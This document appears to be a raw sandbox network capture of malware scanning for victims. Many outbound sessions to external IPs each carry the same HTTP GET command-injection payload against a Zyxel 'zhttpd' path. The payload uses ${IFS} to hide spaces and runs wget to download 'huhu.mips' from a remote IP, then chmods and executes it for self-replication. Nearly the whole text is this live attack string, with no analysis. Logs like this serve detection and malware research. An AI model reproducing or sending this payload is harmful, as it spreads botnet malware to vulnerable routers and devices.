                                              Jan 29, 2024 07:04:07.347502947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8606192.168.2.1448512134.62.113.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347559929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8607192.168.2.1445844120.143.156.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347595930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8608192.168.2.144181045.49.116.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347630024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8609192.168.2.1442384179.52.65.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347664118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8610192.168.2.1446580121.105.82.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347717047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8611192.168.2.1460352100.201.47.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347768068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8612192.168.2.143780020.98.108.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347805977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8613192.168.2.1453182120.146.101.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347839117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8614192.168.2.1438286123.142.209.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347871065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8615192.168.2.1446982202.113.6.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347919941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8616192.168.2.145938463.149.108.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347944021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8617192.168.2.143657239.219.83.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347976923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8618192.168.2.1457158211.138.23.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348025084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8619192.168.2.1456798187.190.188.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348061085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8620192.168.2.1460652178.228.13.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348098993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8621192.168.2.143382257.86.92.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348159075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8622192.168.2.143478486.255.207.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348211050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8623192.168.2.145305060.110.203.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348248959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8624192.168.2.145548088.78.95.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348274946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8625192.168.2.143600854.147.225.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348292112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8626192.168.2.145803423.149.137.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348316908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8627192.168.2.144263668.207.176.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348330975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8628192.168.2.143357898.6.19.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348390102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8629192.168.2.14351728.123.67.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348439932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8630192.168.2.145189680.58.165.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348484039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8631192.168.2.145118248.10.240.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348541021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8632192.168.2.143947893.231.132.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348579884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8633192.168.2.1446772184.73.241.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348606110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8634192.168.2.143874898.57.25.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348650932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8635192.168.2.1433466133.28.255.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348675966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8636192.168.2.143791666.197.191.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348709106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8637192.168.2.1434766122.112.138.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348764896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8638192.168.2.1438246123.190.108.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348805904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8639192.168.2.144403436.142.216.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348845005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8640192.168.2.1449450192.205.4.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348872900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8641192.168.2.1438768157.47.188.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348887920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8642192.168.2.1437610192.142.162.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348927975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8643192.168.2.143396893.44.165.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.348980904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8644192.168.2.144375043.144.14.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349035025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8645192.168.2.145619470.165.154.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349085093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8646192.168.2.1445894103.82.250.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349112988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8647192.168.2.1449008111.154.100.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349121094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8648192.168.2.1446614141.190.118.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349172115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8649192.168.2.1440104113.37.237.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349208117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8650192.168.2.1433576109.46.50.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349227905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8651192.168.2.1453504207.155.33.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349291086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8652192.168.2.14508465.157.94.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349333048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8653192.168.2.1459734177.183.154.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349361897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8654192.168.2.1460412166.76.4.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349394083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8655192.168.2.1454010146.27.179.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349452972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8656192.168.2.145803069.249.101.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349482059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8657192.168.2.145611068.137.159.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349509954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8658192.168.2.143363661.64.56.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349550009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8659192.168.2.1442490169.89.84.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349567890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8660192.168.2.145032263.175.97.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349610090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8661192.168.2.1454070108.41.43.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349637032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8662192.168.2.1450334147.161.135.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349690914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8663192.168.2.143466666.27.71.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349728107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8664192.168.2.1433526179.98.185.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349772930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8665192.168.2.14496941.24.27.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349806070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8666192.168.2.1445862138.173.95.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349823952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8667192.168.2.145366282.29.26.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349853039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8668192.168.2.1435072190.235.250.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349884987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8669192.168.2.1434550195.107.4.2443
                                              TimestampBytes transferredDirectionData
